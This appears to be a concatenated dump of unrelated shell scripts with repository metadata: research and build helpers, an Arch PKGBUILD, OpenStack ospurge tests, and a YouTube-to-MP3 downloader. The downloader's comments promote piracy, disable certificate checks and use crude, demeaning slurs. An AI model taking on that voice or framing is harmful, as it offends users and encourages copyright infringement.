tmO=${tmOutput[$RANDOM % ${#tmOutput[@]}]}
thO=${thresholdOutput[$RANDOM % ${#thresholdOutput[@]}]}
nbO=${nbOutputNeurons[$RANDOM % ${#nbOutputNeurons[@]}]}
# define matlab commands
Attention_parameters="SIMU.DN_tm=$tmA;SIMU.DN_threshold=$thA;"
Intermediate_parameters="SIMU.L1_tm=$tmI;SIMU.L1_threshold=$thI;SIMU.L1_nNeurons=$nbI;"
Output_parameters="SIMU.L2_tm=$tmO;SIMU.L2_maxTh=$thO;SIMU.L2_nNeurons=$nbO;"
run_plots="addpath('./drawingUtils');run('plot_results.m');saveas(gcf,'Results/HyperSimu_$now/HyperSimu$s/Output_HyperSimu$s.png');saveas(gcf,'Results/HyperSimu_$now/HyperSimu$s/Output_HyperSimu$s.fig');close(gcf);"
# matlab
/usr/local/MATLAB/R2018a/bin/matlab -nosplash -nodesktop -r $import_data$simu_parameters$Attention_parameters$Intermediate_parameters$Output_parameters$run_scripts$run_plots$run_accuracy$exit | tee tmp.txt
# save results
sed -n '/OutputData/,/done/p' tmp.txt | grep '[0-9]' | sed 's/ */;/g' | sed 's/^;//g' >> Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv
rm tmp.txt
# get accuracy and save parameters
python3 getAccuracy.py Results/HyperSimu_$now/HyperSimu$s/OutputData_Simu$s.csv | tee tmp.txt
# When accuracy run with Matlab script:
# nbActiveOutputNeurons=$(grep "activated Output" tmp.txt | grep -o "[0-9]*")
# rateActiveOutput=$(grep "Percentage of Output layer activation" tmp.txt | grep -o "[0-9]\.*[0-9]*")
# rateCoding=$(grep "Accuracy - rate coding" tmp.txt | grep -o "[0-9]\.*[0-9]*")
# rankOrderAccuracy=$(grep "Accuracy - rank order coding" tmp.txt | grep -o "[0-9]\.*[0-9]*")
# rankOrderSpecificity=$(grep "Specificity - rank order coding" tmp.txt | grep -o "[0-9]\.*[0-9]*")
# echo "$s;$nbActiveOutputNeurons;$rateActiveOutput;$rateCoding;$rankOrderAccuracy;$rankOrderSpecificity;$thA;$tmA;$thI;$tmI;$nbI;$thO;$tmO;$nbO;" >> Results/HyperSimu_$now/Parameters_Simu_$now.csv
# When accuracy run with Random Forest Classifier (Scikit-learn):
rateCodingAccuracy=$(grep "Rate" tmp.txt | grep -o "[0-9]\.[0-9]*")
rankOrderCodingAccuracy=$(grep "Rank" tmp.txt | grep -o "[0-9]\.[0-9]*")
latencyCodingAccuracy=$(grep "Latency" tmp.txt | grep -o "[0-9]\.[0-9]*")
echo "$s;$rateCodingAccuracy;$rankOrderCodingAccuracy;$latencyCodingAccuracy;$thresholdAttention;$tmAttention;$thresholdInter;$tmInter;$nbInterNeurons;$thresholdOutput;$tmOutput;$nbOutputNeurons;" >> Results/HyperSimu_$now/Parameters_Simu_$now.csv
rm tmp.txt
echo "Done for simulation loop $s"
echo ""
s=$((s+1))
done
end_sim=`date +"%s"`
echo "Récupération des données en" $(($fin-$start)) "secondes"
echo "Simulation complète en" $(($end_sim-$start)) "secondes" | true |
f4da88cb6a8cca43accd96e2c207721d06af1be3 | Shell | Ghostcode75/Bash-Tools | /TOYS/y2m.sh | UTF-8 | 6,277 | 3.890625 | 4 | [] | no_license | #!/usr/local/bin/bash
# Youtube to MP3 BASH script to steal shit...
CPR='Jd Daniel :: Gabelbombe'
MOD="$(date +'%Y-%m-%d @ %H:%M:%S')"
VER='7.1.5'
# REF : https://github.com/Gabelbombe/Bash-Tools/blob/master/TOYS/y2m.sh
# REQ : https://github.com/aadsm/JavaScript-ID3-Reader
## Buyers beware....
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
declare debug=''
declare title=''
declare isurl='http?(s)://*'
function print_usage()
{
echo -e '
Parameter usage: y2m [--help] [--title=<song-title>] [--video=<youtube-url>] [--cover=<cover-${save}>] [--save=<save-location>]
Parameters:
-t --title Title of the MP3 you want, should conform to `Art - Song Name`
-v --video Video URL to fetch from YouTube
-c --cover ${save} to attach to the MP3 [ Defaults to YouTube Promo ${save} ]
-d --save Directory save location [ Defaults to `~/Music` ]
-v --version Displays current version of y2m
Advanced Parameters:
--debug Appends `sketchy debugging` to the script, trust it like youd trust a white girl...
--update Force updates `youtube-dl`, if you err out, run this...
--flush Flushes `youtube-dl` caches
Example usage:
Long: y2m -t "Rick Astley - Never Gonna Give You Up" -s /dev/null -v http://www.youtube.com/watch?v=oHg5SJYRHA0"
Short: y2m http://www.youtube.com/watch?v=oHg5SJYRHA0 ## just pirate the fucking thing already...
'
}
## following requires modern GNU bash 3.2 you loser....
if (shopt -s nocasematch ; [[ ${1} = @(-h|--help) ]]) ; then
print_usage ; exit 1
## because you're a lazy cunt...
elif [[ "${1}" =~ $isurl ]] ; then
video="${1}"
else
while [[ $# -gt 0 ]]; do
opt="${1}" ; shift ;
## no one likes a smart-ass....
current_arg="${1}"
# Broken, needs to detect opt args and current_arg
# [[ -z "${opt}" ]] || [[ "${current_arg}" =~ ^-{0,1}.* ]] && {
# echo -e "[fatal] The Universe doesn't give a fuck about your feelings..."
# exit 6
# }
case "${opt}" in
"-t"|"--title" ) title="${1}" ; shift ;;
"-v"|"--video" ) video="${1}" ; shift ;;
"-c"|"--cover" ) cover="${1}" ; shift ;;
"-s"|"--save" ) save="${1}" ; shift ;;
## version out...
"-v"|"--version" ) echo -e "[info] Current verion is ${VER}"
exit 1
;;
## advanced flags, buyer beware...
"--debug" ) echo -e "[warn] Activating sketchy dumping..."
debug='--verbose --print-traffic --dump-pages'
shift
;;
"--flush" ) echo -e "[info] Flushing caches..."
youtube-dl --no-check-certificate --rm-cache-dir
exit 1
;;
"--update" ) echo -e "[info] Force updating youtube-dl..."
sudo youtube-dl -U
exit 1
;;
## you sir, just boiled the fuckin ocean..
* ) echo -e "[fatal] Invalid option: \""$opt"\"" >&2
return 6
;;
esac
done
fi
## unset usage from global scope
unset -f print_usage
## make a temporary directory and move into it....
tmp_dir=$(mktemp -d -t y2m-XXXXXXXXXX) \
&& cd "${tmp_dir}"
echo -e "[info] Temporary directory is: ${tmp_dir}"
## TODO: implement for stripping / quoting
function ere_quote () {
sed 's/[]\.|$(){}?+*^]/\\&/g' <<< "$*"
}
## if short order (y2m http://addy.com)
[ "x${video}" == "x" ] && { video=${1} ; }
[ "x${save}" == "x" ] && { save="/Users/${USER}/Music/" ; }
## save location exists?
[ ! -d "${save}" ] && {
echo -e "[fatal] Directory '${save}' does not not exist..."
return 9
}
echo -e "[info] Using directory: ${save}"
regex='v=(.*)'
[[ ${video} =~ ${regex} ]] && {
## argsmap
video_id="${BASH_REMATCH[1]}"
video_id="$(echo ${video_id}| cut -d'&' -f1)"
## set comments
declare COMMENTS="
[CPR] ${CPR}
[MOD] ${MOD}
[VER] Y2: ${VER}
[REF] YT: ${video_id}
"
## remove thumb if exists
[ -f 'thumbnail.jpg' ] && {
rm -f 'thumbnail.jpg'
}
## get/set thumbnail for MP3
if [[ "x${cover}" == "x" && ! -f "${cover}" ]] ; then
echo -e "[info] Downloading thumbnail"
youtube-dl --no-check-certificate ${debug} --no-warnings --write-thumbnail ${video} -o thumbnail.jpg
else
echo -e "[info] Using ${cover} as thumbail"
cp -ri "${cover}" thumbnail.jpg
fi
## if you haven't defined a title....
[ "x${title}" == "x" ] && {
title="$(youtube-dl --no-check-certificate ${debug} --no-warnings --get-title ${video} |sed s/://g)"
}
echo -e "[info] Title is: ${title}"
## download the FLV stream
youtube-dl --no-check-certificate ${debug} --no-warnings -o "${title}" ${video}
artist="$(echo ${title} |awk -F ' - ' '{print$1}' |sed -e 's/\[.*//g' -e 's/ */ /g' -e 's/^ *\(.*\) *$/\1/')"
song="$(echo ${title} |awk -F ' - ' '{print$2}' |sed -e 's/\[.*//g' -e 's/ */ /g' -e 's/^ *\(.*\) *$/\1/')"
## format independant, might need: head -n1, also hates ( ) [ ] etc
video=$(ls |grep "${artist}")
echo -e "[info] Using Video: ${video}"
## REQ: FFMPEG proper installers via
## https://github.com/Gabelbombe/Bash-Tools/tree/master/STANDUP
ffmpeg -i "${video}" \
-acodec libmp3lame \
-ab 320k \
-ac 2 \
-vn \
-y "${title}.mp3"
## add ${save} with LAME since FFMPEG changes too much....
lame --preset insane -V0 --id3v2-only --ignore-tag-errors \
--ti 'thumbnail.jpg' \
--ta "${artist}" \
--tt "${song}" \
--tv "TPE2=${artist}" \
--tc "${COMMENTS}" \
"${title}.mp3" "${save}/${title}.mp3"
rm -fr "${tmp_dir}" ## oikology...
} || {
echo -e "[fatal] The Universe doesn't give a fuck about your feelings..."
}
| true |
e8063c43b7f3dd5f1362a47517e9dacdec1b13ae | Shell | ivanvladimir/conectividad_old | /execute.sh | UTF-8 | 8,344 | 3.921875 | 4 | [] | no_license | #! /bin/bash
# autor: @Penserbjorne - Sebastian Aguilar
# FI-IIMAS-IIJ-UNAM
# Modification: @ivanvladimir - Ivan Meza
opt=-1
# Define a timestamp function
timestamp() {
date +"%T"
}
help(){
echo "
ONE SCRIPT TO RULE THEM ALL!!!
Descripción: Script útilizado para automátizar la ejecución y despliegue del sistema.
h) Help
i) Initialize (install dependencies and create environment)
d) Download data
t) Extract text
m) Annotated documents
a) Extract articles
p) Push to production
r) Remove data
z) Execute all process
e) Exit
Uso: ./execute.sh [hidtmaprze]"
exit
}
menu(){
echo -n "
ONE SCRIPT TO RULE THEM ALL!!!
Select an option.
i) Initialize (install dependencies and create environment)
d) Download data
t) Extract text
m) Annotated documents
a) Extract articles
p) Push to production
r) Remove data
z) Execute all process
e) Exit
Option: "
read opt
}
menuOption(){
if [ "$opt" = "i" ] || [ "$opt" = "I" ]; then
initialize
elif [ "$opt" = "d" ] || [ "$opt" = "D" ]; then
downloadData
elif [ "$opt" = "t" ] || [ "$opt" = "T" ]; then
extractText
elif [ "$opt" = "m" ] || [ "$opt" = "M" ]; then
annotatedDocuments
elif [ "$opt" = "a" ] || [ "$opt" = "A" ]; then
extractArticles
# elif [ "$opt" = "s" ] || [ "$opt" = "S" ]; then
# basicStatistics
elif [ "$opt" = "p" ] || [ "$opt" = "P" ]; then
pushToProduction
elif [ "$opt" = "r" ] || [ "$opt" = "R" ]; then
removeData
elif [ "$opt" = "h" ] || [ "$opt" = "H" ]; then
help
elif [ "$opt" = "z" ] || [ "$opt" = "Z" ]; then
removeData
initialize
downloadData
extractText
annotatedDocuments
extractArticles
# basicStatistics
pushToProduction
exit
elif [ "$opt" = "e" ] || [ "$opt" = "E" ]; then
echo " See you!"
exit
else
echo " Error: Nope, I don't know what do you want :/ Sorry!"
fi
}
initialize(){
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > virtualenv -p /usr/bin/python3 env"
virtualenv -p /usr/bin/python3 env
echo $(timestamp) " > source ./env/bin/activate"
source ./env/bin/activate
echo $(timestamp) " > pip install -r requirements.txt"
pip3 install -r requirements.txt
#echo $(timestamp) " > python3 -m nltk.downloader all"
#python3 -m nltk.downloader stopwords
echo $(timestamp) " > deactivate"
deactivate
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
}
downloadData(){
if [ -d "./env" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
mkdir data/contenciosos/text
echo $(timestamp) " > source ./env/bin/activate"
source ./env/bin/activate
echo $(timestamp) " > src/python/download_casos_contenciosos.py"
python3 ./src/python/download_casos_contenciosos.py -v
echo $(timestamp) " > deactivate"
deactivate
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Theres no enviroment! Please \"Initialize\""
fi
}
extractText(){
if [ -d "./env" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > source ./env/bin/activate"
source ./env/bin/activate
echo $(timestamp) " > src/python/extract_text.py"
python3 src/python/extract_text.py -v
echo $(timestamp) " > module_canonical_name.py"
python3 src/python/module_canonical_name.py -v
echo $(timestamp) " > deactivate"
deactivate
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Theres no enviroment! Please \"Initialize\""
fi
}
annotatedDocuments(){
if [ -d "./env" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
if [ ! -d "./data/AnnotatedDocuments" ]; then
echo $(timestamp) " > mkdir ./data/AnnotatedDocuments"
mkdir ./data/annotatedDocuments
fi
echo $(timestamp) " > cd gate/Java/"
cd gate/Java/
echo $(timestamp) " > ./compile_run_embedded.sh"
./compile_run_embedded.sh
echo $(timestamp) " > cd ./../../"
cd ./../../
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Theres no enviroment! Please \"Initialize\""
fi
}
extractArticles(){
if [ -d "./env" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > source ./env/bin/activate"
source ./env/bin/activate
echo $(timestamp) " > src/python/label_articles.py"
python3 src/python/label_articles.py -v
echo $(timestamp) " > deactivate"
deactivate
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Theres no enviroment! Please \"Initialize\""
fi
}
basicStatistics(){
if [ -d "./env" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > source ./env/bin/activate"
source ./env/bin/activate
echo $(timestamp) " > basic_statistics.py"
python3 basic_statistics.py -v
echo $(timestamp) " > deactivate"
deactivate
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Theres no enviroment! Please \"Initialize\""
fi
}
pushToProduction(){
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > cd ./../../webapp/"
cd ./../../webapp/
echo $(timestamp) " > cp -r ./../src/python/data/DB.json ./DB.json"
cp -r ./../src/python/data/DB.json ./DB.json
echo $(timestamp) " > cp -r ./../src/python/data/annotatedDocuments ./annotatedDocuments"
cp -r ./../src/python/data/annotatedDocuments ./annotatedDocuments
echo $(timestamp) " > cp -r ./../src/python/data/contenciosos ./contenciosos"
cp -r ./../src/python/data/contenciosos ./contenciosos
echo $(timestamp) " > cp -r ./../src/python/data/graph.json ./graph.json"
cp -r ./../src/python/data/graph.json ./graph.json
echo $(timestamp) " > cd ./../src/python/ "
cd ./../src/python/
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
}
removeData(){
echo -n "
This going to remove all data from local enviroment (data folder, DB.json, annotatedDocuments and graph.json)
Continue? y/n: "
read opt
if [ "$opt" = "y" ] || [ "$opt" = "Y" ]; then
TIME_INI=$(date -u -d "$(timestamp)" +"%s")
echo
echo $(timestamp) " > Begining"
echo $(timestamp) " > rm -rf ./data"
rm -rf ./data
# echo $(timestamp) " > rm -rf ./../../webapp/DB.json"
# rm -rf ./../../webapp/DB.json
# echo $(timestamp) " > rm -rf ./../../webapp/annotatedDocuments"
# rm -rf ./../../webapp/annotatedDocuments
# echo $(timestamp) " > rm -rf ./../../webapp/project/client/static/graph.json"
# rm -rf ./../../webapp/project/client/static/graph.json
TIME_FIN=$(date -u -d "$(timestamp)" +"%s")
echo "Total time: " $(date -u -d "0 $TIME_FIN sec - $TIME_INI sec" +"%H:%M:%S")
echo
else
echo " Ok, dont worry, sometimes is ... is ... is just fine to don't erase the old moments :)"
fi
}
echo $(timestamp) " > ulimit -m 2097152 => Max. 2 GB"
#echo $(timestamp) " > ulimit -m 7340032 => Max. 7 GB"
ulimit -m 2097152
#ulimit -m 7340032
count=0
for var in "$@"
do
(( count++ ))
(( accum += ${#var} ))
opt=$var
menuOption
done
# Hubo comandos, salimos ;@
if [ "$opt" != "-1" ]; then
exit
fi
echo "ONE SCRIPT TO RULE THEM ALL!!!"
echo "Es necesario instalar tkinter para python3 por separado."
echo "En Arch es sudo pacman -S tk"
echo "Es necesario intalar virtualenv por separado."
echo "En Arch es sudo pacman -S python-virtualenv"
echo
while [ "$opt" != "e" ] || [ "$opt" != "E" ] ; do
menu
menuOption
done
| true |
c9b32e170a2b1b99a02bc2f79e442a2d22f1604a | Shell | LeoDaza7/NFS-Cluster | /log_script.sh | UTF-8 | 196 | 2.875 | 3 | [] | no_license | #!/bin/bash
echo "writing data to $1/$(hostname)-$(hostname -I | awk '{print $1}').log..."
while true
do
echo $(date) >> $1/$(hostname)-$(hostname -I | awk '{print $1}').log
sleep 5
done
| true |
66ab2c79e15ec351b2464852983a000c88fa9472 | Shell | suriya/dot-files | /bin/run-if-needed | UTF-8 | 3,253 | 3.921875 | 4 | [] | no_license | #!/usr/bin/env bash
#
# $Id: run-if-needed 760 2007-03-19 15:45:14Z suriya $
#
# FILE: run-if-needed.sh
# AUTHOR: Suriya Subramanian <suriya@cs.utexas.edu>
# DATE: Sat Jun 12 16:28:54 CDT 2004
#
# Copyright (C) 2004 Suriya Subramanian <suriya@cs.utexas.edu>
# All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# =========================== =================================================
#
# This is used by me to run some command (for example, a fortune, reminding
# me of people's birthdays, etc) at login. But I dont want this command to
# run at every login. I dont need to be reminded of birthday's everytime I
# spawn a new console, right? What I want is to be reminded or shown a
# fortune, if I spawn a console after some hours. So, given a
# TIMESTAMPFILE, INTERVAL and a COMMAND to execute, executes the command if
# TIMESTAMPFILE has not been accessed in the past INTERVAL seconds. After
# executing the command, it touches TIMESTAMPFILE. An option "--force" is
# available to force execution of the command, eventhough it has been
# executed recently (within INTERVAL). In such a case INTERVAL should not
# be logically required, but this script is not yet smart enough to check
# for that
#
# Usage: run-if-needed.sh --timestamp hello.timestamp \
# --interval 3600 \
# --command echo "Hello World"
#
# Putting the above command into ~/.bashrc echoes "Hello World" whenever a
# new bash shell is created after an interval of an hour
#
function usage() {
echo "Usage: FIXME" >&2;
exit 1;
}
function process_cmdline() {
FORCE=0
while [ $# -ne 0 ]
do
case $1 in
--timestamp | -t)
shift
TIMESTAMPFILE=$1
shift
;;
--interval | -i)
shift
INTERVAL=$1
shift
;;
--command | -c)
shift
COMMANDFLAG=1
COMMAND=$@
# eliminate remaining arguments (since we have gobbled them
shift $#
;;
--force | -f)
shift
FORCE=1
;;
*)
echo "Warning: Ignoring commandline argument" $1 >&2
shift
;;
esac
done
}
function should_We_Run() {
[ ${FORCE} == 1 ] && return 0;
[ -a ${TIMESTAMPFILE} ] || return 0;
[ $((`date +%s` - `stat --format=%X ${TIMESTAMPFILE}`)) -gt ${INTERVAL} ];
}
function Run() {
${COMMAND} || exit 1;
touch ${TIMESTAMPFILE}
}
process_cmdline $@
# --timestamp file --interval 2342 --command grep -i suriya /etc/passwd
[ ${TIMESTAMPFILE} ] || { echo "TIMESTAMPFILE not specified" >&2; usage; }
[ ${INTERVAL} ] || { echo "INTERVAL not specified" >&2; usage; }
[ ${COMMANDFLAG} ] || { echo "COMMAND not specified" >&2; usage; }
should_We_Run && Run
exit 0
| true |
18536ed90ddad8a23c2d889ea6f0a7047b54e5b1 | Shell | HuangStomach/gini | /docker/pei/friso.bash | UTF-8 | 500 | 2.5625 | 3 | [
"MIT"
] | permissive | PHP_MODULE_PATH=php-$(echo "<?= PHP_MAJOR_VERSION.'.'.PHP_MINOR_VERSION ?>"|php7)
curl -sLo /usr/lib/libfriso.so "http://files.docker.genee.in/alpine/${PHP_MODULE_PATH}/libfriso.so" \
&& curl -sLo /usr/lib/php7/modules/friso.so "http://files.docker.genee.in/alpine/${PHP_MODULE_PATH}/friso.so" \
&& curl -sL http://files.docker.genee.in/friso-etc.tgz | tar -zxf - -C /etc \
&& printf "extension=friso.so\n\n[friso]\nfriso.ini_file=/etc/friso/friso.ini\n" > /etc/php7/conf.d/20_friso.ini
| true |
0f390c78774016a74a2ee052859e18f321d4bc91 | Shell | mgarciaisaia/shield-procer | /shield/core/mostrarAyuda.sh | UTF-8 | 1,126 | 3.65625 | 4 | [] | no_license | #!/bin/bash
# If no built-in name was given, print the help text for every built-in;
# otherwise print the help for the requested one only.
AYUDA="Brinda ayuda sobre el buit-in ingresado, de no ingresar ninguno, brinda ayuda de todos los built-ins"
INFOM="Muestra información sobre los módulos que contengan la cadena ingresada, de no ingresar ninguna cadena, muestra información sobre todos los módulos"
LISTAR="Lista el path absolutos de los modulos que tiene activos"
ACTUAL="Registra e inicializa los módulos del usuario"
MOSTRAR="Muestra el contenido de esa variable interna del shell"
SALIR="Termina la sesión actual"
APAGAR="Apaga el sistema"
# Quoting "$1" keeps the test valid when the argument is empty or contains
# spaces; the unquoted form broke with multi-word input.
if [ -z "$1" ]
then
    # Show the help for every built-in (expansions quoted to avoid
    # word splitting/globbing; output is unchanged).
    echo "ayuda <buit-in> : " "$AYUDA"
    echo "info_modulos <cadena> : " "$INFOM"
    echo "listar_modulos : " "$LISTAR"
    echo "actualizar_modulos : " "$ACTUAL"
    echo "mostrar variable : " "$MOSTRAR"
    echo "salir : " "$SALIR"
    echo "apagar : " "$APAGAR"
else
    case "$1" in
    ayuda) echo "$AYUDA"
    ;;
    info_modulos) echo "$INFOM"
    ;;
    listar_modulos) echo "$LISTAR"
    ;;
    actualizar_modulos) echo "$ACTUAL"
    ;;
    mostrar) echo "$MOSTRAR"
    ;;
    salir) echo "$SALIR"
    ;;
    apagar) echo "$APAGAR"
    ;;
    esac
fi
| true |
38c69577597a06d3341b53d48969130b2f101e50 | Shell | petronny/aur3-mirror | /ruby-text-hyphen/PKGBUILD | UTF-8 | 800 | 2.5625 | 3 | [] | no_license | # Maintainer: Francois Garillot <francois[@]garillot.net>
# Contributor: Daenyth <Daenyth+Arch [at] gmail [dot] com>
_gemname=text-hyphen
pkgname=ruby-$_gemname
pkgver=1.4.1
pkgrel=1
pkgdesc="Text::Hyphen is a Ruby library to hyphenate words in various languages using Ruby-fied versions of TeX hyphenation patterns"
arch=('any')
url="http://rubygems.org/gems/text-hyphen"
license=('GPL')
depends=('ruby')
makedepends=('rubygems')
source=(http://rubygems.org/downloads/$_gemname-$pkgver.gem)
noextract=($_gemname-$pkgver.gem)
md5sums=('e44f810d85b7ea4d568cd991af364bd9')
sha1sums=('ec45bc4b96a0b094158907a1f1daf638ef131669')
# Install the downloaded gem into the staging directory ($pkgdir),
# mirroring the system-wide gem layout reported by the target Ruby.
package() {
# Ask Ruby where gems are installed system-wide (e.g. /usr/lib/ruby/gems/...).
cd "$srcdir"
local _gemdir="$(ruby -e'puts Gem.default_dir')"
# --ignore-dependencies: runtime deps are handled by pacman's depends=().
gem install --ignore-dependencies --no-user-install -i "$pkgdir$_gemdir" $_gemname-$pkgver.gem
}
# vim:set ts=2 sw=2 et:
| true |
e2fb2d6fda7009b67df29aff4ed4b1d167b7045c | Shell | syseleven/ospurge | /tools/func-tests.sh | UTF-8 | 5,230 | 3.421875 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Be strict (but not too much: '-u' doesn't always play nice with devstack)
set -eo pipefail
# Absolute directory of this script, resolved independently of $PWD.
readonly PROGDIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
# Try to detect whether we run in the OpenStack Gate.
if [[ -d ~stack/devstack ]]; then
export DEVSTACK_DIR=~stack/devstack
GATE_RUN=1
else
export DEVSTACK_DIR=~/devstack
GATE_RUN=0
fi
#projectname_username
# Scrape OS_PASSWORD out of the devstack account rc files; the sed -nr
# expression prints only the value captured between the quotes.
invisible_to_admin_demo_pass=$(cat $DEVSTACK_DIR/accrc/invisible_to_admin/demo | sed -nr 's/.*OS_PASSWORD="(.*)"/\1/p')
admin_admin_pass=$(cat $DEVSTACK_DIR/accrc/admin/admin | sed -nr 's/.*OS_PASSWORD="(.*)"/\1/p')
function assert_compute {
    # Abort the whole test run if the populated VM vanished: `nova list`
    # table output shorter than 5 lines means fewer than one VM row.
    local vm_rows
    vm_rows=$(nova list | wc -l)
    if (( vm_rows >= 5 )); then
        return 0
    fi
    echo "Less than one VM, someone cleaned our VM :("
    exit 1
}
# Abort (exit 1) unless the Neutron resources created by populate.sh are
# still present; each check compares table output line counts (headers
# and borders included, hence the offsets).
function assert_network {
# We expect at least 1 "" (free), 1 "compute:",
# 1 "network:router_interface" and 1 "network:dhcp" ports
if [[ $(neutron port-list | wc -l) -lt 8 ]]; then
echo "Less than 4 ports, someone cleaned our ports :("
exit 1
fi
# We expect at least 2 security groups (default + one created by populate)
if [[ $(openstack security group list | wc -l) -lt 6 ]]; then
echo "Less than 2 security groups, someone cleaned our sec-groups :("
exit 1
fi
# At least one floating IP must survive until the purge step.
if [[ $(openstack floating ip list | wc -l) -lt 5 ]]; then
echo "Less than one floating ip, someone cleaned our FIP :("
exit 1
fi
}
# Abort unless the Cinder resource created by populate.sh still exists.
# In the Gate (GATE_RUN=1) the backup service is enabled, so the backup is
# checked; locally only the raw volume is checked.
function assert_volume {
if [[ ${GATE_RUN} == 1 ]]; then
# The Cinder backup service is enabled in the Gate.
if [[ $(openstack volume backup list | wc -l) -lt 5 ]]; then
echo "Less than one backup, someone cleaned our backup:("
exit 1
fi
else
if [[ $(openstack volume list | wc -l) -lt 5 ]]; then
echo "Less than one volume, someone cleaned our volume:("
exit 1
fi
fi
}
########################
### Pre check
########################
source $DEVSTACK_DIR/openrc admin admin
if [[ ! "$(openstack flavor list)" =~ 'm1.nano' ]]; then
openstack flavor create --id 42 --ram 64 --disk 1 --vcpus 1 m1.nano
fi
########################
### Populate
########################
# Fan out: run populate.sh for three project/user combinations in parallel
# subshells, recording each background job's PID so the loop below can
# reap them and detect failures.
pid=()
(source $DEVSTACK_DIR/openrc admin admin && ${PROGDIR}/populate.sh) &
pid+=($!)
(source $DEVSTACK_DIR/openrc demo demo && ${PROGDIR}/populate.sh) &
pid+=($!)
(source $DEVSTACK_DIR/openrc demo invisible_to_admin && ${PROGDIR}/populate.sh) &
pid+=($!)
#(source $DEVSTACK_DIR/openrc alt_demo alt_demo && ${PROGDIR}/populate.sh) &
#pid+=($!)
# Barrier: reap every populate.sh background job and abort on the first
# failure.
for i in "${!pid[@]}"; do
    # Test `wait` directly: with `set -e` in effect, a bare failing `wait`
    # terminated the script before the old `$?` check could ever report
    # which job failed.
    if ! wait "${pid[i]}"; then
        echo "One of the 'populate.sh' execution failed."
        exit 1
    fi
    unset "pid[$i]"
done
########################
### Cleanup
########################
tox -e run -- --os-cloud devstack-admin --purge-own-project --verbose # purges admin/admin
source $DEVSTACK_DIR/openrc demo demo
assert_compute && assert_network && assert_volume
tox -e run -- --os-cloud devstack --purge-own-project --verbose # purges demo/demo
source $DEVSTACK_DIR/openrc demo invisible_to_admin
assert_compute && assert_network && assert_volume
tox -e run -- \
--os-auth-url http://localhost/identity \
--os-username demo --os-project-name invisible_to_admin \
--os-password $invisible_to_admin_demo_pass \
--os-domain-id=$OS_PROJECT_DOMAIN_ID \
--purge-own-project --verbose
#source $DEVSTACK_DIR/openrc alt_demo alt_demo
#assert_compute && assert_network && assert_volume
source $DEVSTACK_DIR/openrc admin admin
#openstack project set --disable alt_demo
#tox -e run -- --os-auth-url http://localhost/identity --os-username admin --os-project-name admin --os-password $admin_admin_pass --purge-project alt_demo --verbose
#openstack project set --enable alt_demo
########################
### Final assertion
########################
# Post-purge verification: after all purges only table headers/empty
# listings should remain (the -ne counts account for header lines).
if [[ $(nova list --all-tenants --minimal | wc -l) -ne 4 ]]; then
echo "Not all VMs were cleaned up"
exit 1
fi
if [[ $(neutron port-list | wc -l) -ne 1 ]]; then # This also checks FIP
echo "Not all ports were cleaned up"
exit 1
fi
if [[ ${GATE_RUN} == 1 ]]; then
# The Cinder backup service is enabled in the Gate.
if [[ $(openstack volume backup list --all-projects | wc -l) -ne 1 ]]; then
echo "Not all volume backups were cleaned up"
exit 1
fi
else
if [[ $(openstack volume list --all-projects | wc -l) -ne 1 ]]; then
echo "Not all volumes were cleaned up"
exit 1
fi
fi
if [[ $(openstack zone list --all-projects | wc -l) -ne 1 ]]; then # This also checks FIP
echo "Not all zones were cleaned up"
exit 1
fi
| true |
